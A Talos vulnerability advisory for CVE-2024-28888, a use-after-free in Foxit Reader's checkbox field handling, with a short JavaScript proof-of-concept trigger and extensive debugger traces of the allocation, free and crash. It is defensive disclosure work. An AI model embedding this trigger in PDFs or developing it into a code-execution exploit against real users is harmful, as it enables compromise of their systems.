Talos Vulnerability Report

TALOS-2024-1967

Foxit Reader checkbox Calculate use-after-free vulnerability

October 2, 2024
CVE Number

CVE-2024-28888

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a checkbox field object. Specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site while the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2024.1.0.23997

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. A use-after-free vulnerability exists in the way Foxit Reader handles a checkbox field object. This can be illustrated by the following proof-of-concept code:

function main() {
  // Create a checkbox field; the field object created here is the one that is later freed.
  var aa = app.activeDocs[0].addField("ADD", "checkbox", 2, [17,0,5,14]).defaultIsChecked(0);
  // Attach the callback to the Calculate event of the "txt3" text field.
  getField("txt3").setAction("Calculate", 'delete_pages();');
  // The second addField call fires the Calculate event while the field object is still in use.
  app.activeDocs[0].addField("ADD", "checkbox", 0, [17,0,5,14]);
}

function delete_pages(arg1, arg2, arg3) {
  // deletePages frees every object associated with a page, including the checkbox field.
  app.activeDocs[0].deletePages();
  app.activeDocs[0].deletePages();
}

The above code creates a checkbox field object. A callback function is assigned to the Calculate event of the TextField object, and the event is promptly triggered by the second call to addField. The action callback does nothing but call deletePages, which in turn frees all the objects associated with a page. The use-after-free occurs because the checkbox field object freed by deletePages() is then used without any validation. We can observe the following in the debugger (with PageHeap enabled):

eax=076fe070 ebx=076fe0dc ecx=02cc3280 edx=00000002 esi=131c5ae8 edi=160501a8
eip=030956e9 esp=076fe048 ebp=076fe088 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x1168450 (02cc3280)}
0:000> g
in javascript::Field::AddField
eax=011397f0 ebx=076fe0dc ecx=1035bbc8 edx=04a78d94 esi=131c5ae8 edi=160501a8
eip=02d6e633 esp=076fddc8 ebp=076fde88 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x1213803:
02d6e633 ffd0            call    eax {FoxitPDFReader!CryptUIWizExport+0x30970 (011397f0)}
[...]
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc07 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506957:
01b0fc07 f30f5cc2        subss   xmm0,xmm2
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc0b esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50695b:
01b0fc0b f20f101570463e05 movsd   xmm2,mmword ptr [FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::`vbtable'+0x5c574 (053e4670)] ds:002b:053e4670=7fffffffffffffff
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc13 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506963:
01b0fc13 0f5ac0          cvtps2pd xmm0,xmm0
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc16 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506966:
01b0fc16 0f54c2          andps   xmm0,xmm2
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc19 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506969:
01b0fc19 660f5ac0        cvtpd2ps xmm0,xmm0
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc1d esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50696d:
01b0fc1d 0f2fc4          comiss  xmm0,xmm4
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc20 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506970:
01b0fc20 0f8237040000    jb      FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dad (01b1005d) [br=0]
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc26 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506976:
01b0fc26 f30f5ccb        subss   xmm1,xmm3
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc2a esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50697a:
01b0fc2a 0f5ac1          cvtps2pd xmm0,xmm1
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc2d esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50697d:
01b0fc2d 0f54c2          andps   xmm0,xmm2
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc30 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506980:
01b0fc30 660f5ac0        cvtpd2ps xmm0,xmm0
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc34 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506984:
01b0fc34 0f2fc4          comiss  xmm0,xmm4
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc37 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506987:
01b0fc37 0f8220040000    jb      FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dad (01b1005d) [br=0]
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc3d esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50698d:
01b0fc3d 8b751c          mov     esi,dword ptr [ebp+1Ch] ss:002b:076fdd6c=00000002
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=00000002 edi=16426750
eip=01b0fc40 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506990:
01b0fc40 c745e800000100  mov     dword ptr [ebp-18h],10000h ss:002b:076fdd38=076fdd54
0:000> pc
eax=076fdd74 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=00000002 edi=16426750
eip=01b0fc86 esp=076fdcf4 ebp=076fdd50 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200297
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5069d6:
01b0fc86 e8351a3c00      call    FoxitPDFReader!safe_vsnprintf+0x376890 (01ed16c0) ;<----------------------------------- (2)
0:000> p
eax=18babf00 ebx=076fe0dc ecx=175db036 edx=00000001 esi=00000002 edi=16426750
eip=01b0fc8b esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5069db:
01b0fc8b 8bf8            mov     edi,eax
0:000> dd eax
18babf00  0c8cb610 18bbf0e0 18bbf0b0 00000000
18babf10  00000000 00000000 00000000 00000000
18babf20  00000000 00000000 00000000 00000000
18babf30  00000000 00000000 00000000 00000000
18babf40  00000000 00000000 00000000 00000000
18babf50  00000000 00000000 00000000 00000000
18babf60  00000000 00000000 00000000 00000000
18babf70  00000000 00000000 00000000 00000000
0:000> dd 18bbf0e0                        ;<----------------------------------- (3)
18bbf0e0  00000003 00000000 0c8cb610 18bbf0b0
18bbf0f0  00000000 18b92af8 00000001 00000001
18bbf100  00000000 00000004 00000000 00000000
18bbf110  00000000 18bb7c08 18bb7c20 18bb7c38
18bbf120  18bb7c50 18bbe280 18bbe2a0 18bb7c68
18bbf130  18bbe2c0 18bb7c80 18ba1c78 18bbe2e0
18bbf140  18bb7c98 18bb7cb0 18bb7cc8 18bb7ce0
18bbf150  18bb7cf8 18bb7d10 18bb7d28 18bb7d40

At (1) above, the javascript::CFXJS_Document::addField_static method, which backs the JavaScript API addField(), is called. This method eventually calls CPDF_InterForm::CreateControl at (2), and CreateControl allocates the vulnerable buffer. The contents of the vulnerable buffer are examined at (3).

eax=076fe070 ebx=076fe0dc ecx=02cc3280 edx=00000002 esi=10e4c678 edi=10e69e58
eip=030956e9 esp=076fe048 ebp=076fe088 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x1168450 (02cc3280)}
0:000> g
eax=011397f0 ebx=076fe0dc ecx=1035bbc8 edx=04a78d94 esi=10e4c678 edi=10e69e58
eip=02d6e633 esp=076fddc8 ebp=076fde88 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x1213803:
02d6e633 ffd0            call    eax {FoxitPDFReader!CryptUIWizExport+0x30970 (011397f0)}
0:000> g
eax=009733f0 ebx=076fe0dc ecx=164269c8 edx=075dd000 esi=10e4c678 edi=16426b30
eip=01b0fbad esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5068fd:
01b0fbad ffd0            call    eax {FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xf3f40 (009733f0)}
0:000> g
eax=076fd4c8 ebx=076fd534 ecx=02cc4f80 edx=00000002 esi=10e708f0 edi=10e84008
eip=030956e9 esp=076fd4a0 ebp=076fd4e0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02cc4f80)}
0:000> g
ModLoad: 6afe0000 6b337000   C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\PDFAccessibility.fpi
js_calls
eax=076fd4c8 ebx=076fd534 ecx=02cc4f80 edx=00000002 esi=12fbfb60 edi=130764b0
eip=030956e9 esp=076fd4a0 ebp=076fd4e0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02cc4f80)}  ;<-------------------- (4)
[...]
0:000> g
eax=076fcfe4 ebx=18bbf0b0 ecx=0c8cb610 edx=075dd000 esi=0c8cb610 edi=076fd0d4
eip=01ed21f6 esp=076fcfcc ebp=076fcfdc iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200297
FoxitPDFReader!safe_vsnprintf+0x3773c6:
01ed21f6 e845000000      call    FoxitPDFReader!safe_vsnprintf+0x377410 (01ed2240) ;<-------------------- (5)

[...]
0:000> pc
eax=00000000 ebx=18ba1458 ecx=18ba1458 edx=075dd000 esi=1c789aa0 edi=0000000b
eip=01ed2477 esp=076fcf6c ebp=076fcfc4 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200297
FoxitPDFReader!safe_vsnprintf+0x377647:
01ed2477 e854f2ebff      call    FoxitPDFReader!safe_vsnprintf+0x2368a0 (01d916d0)
0:000> pc
eax=1c789aa0 ebx=18ba1458 ecx=18ba1458 edx=075dd000 esi=1c789aa0 edi=0000000b
eip=01ed248d esp=076fcf68 ebp=076fcfc4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x37765d:
01ed248d e80e1aecff      call    FoxitPDFReader!safe_vsnprintf+0x239070 (01d93ea0)
0:000> pc
eax=1c789aa0 ebx=076fcfe4 ecx=0c8cb674 edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24a7 esp=076fcf6c ebp=076fcfc4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x377677:
01ed24a7 e8942a2500      call    FoxitPDFReader!safe_vsnprintf+0x5ca110 (02124f40)
0:000> pc
eax=18ba9501 ebx=076fcfe4 ecx=18bbf0e0 edx=18ba95bc esi=18bbf0e0 edi=0c8cb610
eip=01ed24b4 esp=076fcf70 ebp=076fcfc4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x377684:
01ed24b4 e8a7f20000      call    FoxitPDFReader!safe_vsnprintf+0x386930 (01ee1760)
0:000> p
eax=00000000 ebx=076fcfe4 ecx=175da3b2 edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24b9 esp=076fcf70 ebp=076fcfc4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x377689:
01ed24b9 56              push    esi                                             ;<---------------(6)
0:000> p
eax=00000000 ebx=076fcfe4 ecx=175da3b2 edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24ba esp=076fcf6c ebp=076fcfc4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x37768a:
01ed24ba e8e1832400      call    FoxitPDFReader!safe_vsnprintf+0x5bfa70 (0211a8a0) ;<----------- (7)
0:000> dd esi                                                       ;<----------- (8)
18bbf0e0  00000003 00000000 0c8cb610 1c789aa0  
18bbf0f0  00000000 18b92af8 00000000 00000002
18bbf100  00000000 00000004 00000000 00000000
18bbf110  00010006 18bbf0b0 00000000 00000000
18bbf120  00000000 1c7711a0 00000010 00000002
18bbf130  18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140  00010006 18bbf0b0 00000000 00000000
18bbf150  00000000 1c7711e0 00000010 00000001
0:000> p
eax=00000000 ebx=076fcfe4 ecx=175da3be edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24bf esp=076fcf6c ebp=076fcfc4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x37768f:
01ed24bf 83c404          add     esp,4
0:000> dd esi                                                 ;<----------- (9)
18bbf0e0  00000000 00000000 0c8cb610 1c789aa0
18bbf0f0  00000000 18b92af8 00000000 00000002
18bbf100  00000000 00000004 00000000 00000000
18bbf110  00010006 18bbf0b0 00000000 00000000
18bbf120  00000000 1c7711a0 00000010 00000002
18bbf130  18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140  00010006 18bbf0b0 00000000 00000000
18bbf150  00000000 1c7711e0 00000010 00000001

At (4) above, the javascript::CFXJS_Document::deletePages_static method, which backs the JavaScript API deletePages(), is called. It calls CPDF_InterForm::DeleteField at (5). DeleteField calls CFX_Object::operator_delete at (7) on the vulnerable buffer. At (6), the argument to operator_delete is pushed onto the stack from the register esi. The contents of the vulnerable object are examined at (8) and (9), which show the values before and after operator_delete is called. Note that the Foxit application uses a custom allocator, so page heap is not able to mark the page holding the vulnerable buffer. The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> p
eax=ffffffff ebx=076fe0dc ecx=175db032 edx=075dd000 esi=00000001 edi=1c777df0
eip=01b1001f esp=076fdcf8 ebp=076fdd50 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d6f:
01b1001f 8b4dcc          mov     ecx,dword ptr [ebp-34h] ss:002b:076fdd1c=18bbf0e0
0:000> p
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=00000001 edi=1c777df0
eip=01b10022 esp=076fdcf8 ebp=076fdd50 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d72:
01b10022 e849573d00      call    FoxitPDFReader!safe_vsnprintf+0x38a940 (01ee5770)
0:000> dd ecx                                                        <------------------------ (10)
18bbf0e0  00000000 0000001f 0000001f 62626952
18bbf0f0  435f6e6f 67657461 5f79726f 74736f50
18bbf100  6e616353 6974704f 00736e6f 00000000
18bbf110  00010006 18bbf0b0 00000000 00000000
18bbf120  00000000 1c7711a0 00000010 00000002
18bbf130  18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140  00010006 18bbf0b0 00000000 00000000
18bbf150  00000000 1c7711e0 00000010 00000001
0:000> db ecx L28
18bbf0e0  00 00 00 00 1f 00 00 00-1f 00 00 00 52 69 62 62  ............Ribb
18bbf0f0  6f 6e 5f 43 61 74 65 67-6f 72 79 5f 50 6f 73 74  on_Category_Post
18bbf100  53 63 61 6e 4f 70 74 69                          ScanOpti
0:000> t
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=00000001 edi=1c777df0
eip=01ee5770 esp=076fdcf4 ebp=076fdd50 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x38a940:
01ee5770 55              push    ebp
0:000> pc
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=18bbf0e0 edi=00000000
eip=01ee5785 esp=076fdcd4 ebp=076fdcf0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x38a955:
01ee5785 e8567cffff      call    FoxitPDFReader!safe_vsnprintf+0x3825b0 (01edd3e0)
0:000> t
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=18bbf0e0 edi=00000000
eip=01edd3e0 esp=076fdcd0 ebp=076fdcf0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x3825b0:
01edd3e0 55              push    ebp
0:000> pc
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01edd431 esp=076fdcb4 ebp=076fdccc iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x382601:
01edd431 e8da42ebff      call    FoxitPDFReader!safe_vsnprintf+0x2368e0 (01d91710)
0:000> t
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91710 esp=076fdcb0 ebp=076fdccc iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e0:
01d91710 55              push    ebp
0:000> p
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91711 esp=076fdcac ebp=076fdccc iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e1:
01d91711 8bec            mov     ebp,esp
0:000> p
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91713 esp=076fdcac ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e3:
01d91713 51              push    ecx
0:000> p
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91714 esp=076fdca8 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e4:
01d91714 8d45fc          lea     eax,[ebp-4]
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91717 esp=076fdca8 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e7:
01d91717 c745fc00000000  mov     dword ptr [ebp-4],0  ss:002b:076fdca8=62626952
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d9171e esp=076fdca8 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368ee:
01d9171e 50              push    eax
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d9171f esp=076fdca4 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368ef:
01d9171f ff7508          push    dword ptr [ebp+8]    ss:002b:076fdcb4=076fdcc4
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91722 esp=076fdca0 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368f2:
01d91722 83c110          add     ecx,10h
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626962 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91725 esp=076fdca0 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368f5:
01d91725 e8d6343900      call    FoxitPDFReader!safe_vsnprintf+0x5c9dd0 (02124c00) ;<----------------- (11)
0:000> p
(21e8.21f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000008e0 ebx=00000000 ecx=00000066 edx=00000000 esi=62626962 edi=076fdcc4
eip=02124612 esp=076fdc7c ebp=076fdc84 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
FoxitPDFReader!safe_vsnprintf+0x5c97e2:
02124612 f77608          div     eax,dword ptr [esi+8] ds:002b:6262696a=???????? ;<----------------- (12)
0:000> u
FoxitPDFReader!safe_vsnprintf+0x5c97e2:
02124612 f77608          div     eax,dword ptr [esi+8]
02124615 8b450c          mov     eax,dword ptr [ebp+0Ch]
02124618 8910            mov     dword ptr [eax],edx
0212461a 8b7604          mov     esi,dword ptr [esi+4]
0212461d 85f6            test    esi,esi
0212461f 7422            je      FoxitPDFReader!safe_vsnprintf+0x5c9813 (02124643)
02124621 8b3496          mov     esi,dword ptr [esi+edx*4]
02124624 85f6            test    esi,esi
0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 076fdc84 02124c10     076fdcc4 076fdc94 62626962 FoxitPDFReader!safe_vsnprintf+0x5c97e2
01 076fdc98 01d9172a     076fdcc4 076fdca8 00000000 FoxitPDFReader!safe_vsnprintf+0x5c9de0
02 076fdcac 01edd436     076fdcc4 18bbf0e0 00000000 FoxitPDFReader!safe_vsnprintf+0x2368fa
03 076fdccc 01ee578a     62626952 0539e638 00000000 FoxitPDFReader!safe_vsnprintf+0x382606
04 076fdcf0 01b10027     00000000 175db18a 16426b30 FoxitPDFReader!safe_vsnprintf+0x38a95a
05 076fdd50 0113e5ce     076fdc01 40a00000 41880000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d77
06 076fdd9c 02d6eb05     076fdd74 40a00000 41880000 FoxitPDFReader!CryptUIWizExport+0x3574e
07 076fde88 02d0f51a     1035bbc8 00000000 00000002 FoxitPDFReader!safe_vsnprintf+0x1213cd5
08 076fdfa0 02cc3529     10e69e58 076fe068 076fdfe8 FoxitPDFReader!safe_vsnprintf+0x11b46ea
09 076fe040 030956eb     10e69e58 076fe070 076fe068 FoxitPDFReader!safe_vsnprintf+0x11686f9
0a 076fe088 03279a6b     15bb20a0 18a69525 15bb20a0 FoxitPDFReader!FXJSE_GetClass+0x26b
0b 076fe0f0 0327922e     076fe138 18a69525 076fe210 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cab
0c 076fe184 032794e5     076fe1b4 15bb20a0 076fe210 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e346e
0d 076fe1cc 0327936b     076fe1e4 00000009 076fe22c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3725
0e 076fe1e8 0349b17b     00000009 076fe22c 15bb20a0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35ab
